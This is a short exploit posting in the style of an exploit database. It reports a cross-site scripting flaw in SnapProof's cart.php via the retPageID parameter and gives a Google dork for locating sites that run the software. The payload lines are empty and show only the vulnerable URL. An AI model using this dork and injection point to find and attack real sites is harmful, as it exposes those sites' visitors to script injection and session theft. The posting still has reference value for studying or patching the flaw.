########################################################## # Exploit Title: SnapProof (cart.php) Cross Site Scripting # Google Dork: inurl:"Created and powered by SnapProof" # home : www.D99Y.com # Date: 1/3/2011 # Author: Difficult 511 # Software Link: http://www.snapproof.com/ ########################################################## # # file : # # cart.php # # exploit : # # http://localhost/cart.php?retPageID= [ XSS ] # # http://localhost/cart.php?retPageID= # # http://localhost/cart.php?retPageID= # ########################################################## Greetz : NassRawI and all members D99Y.com Enjoy :)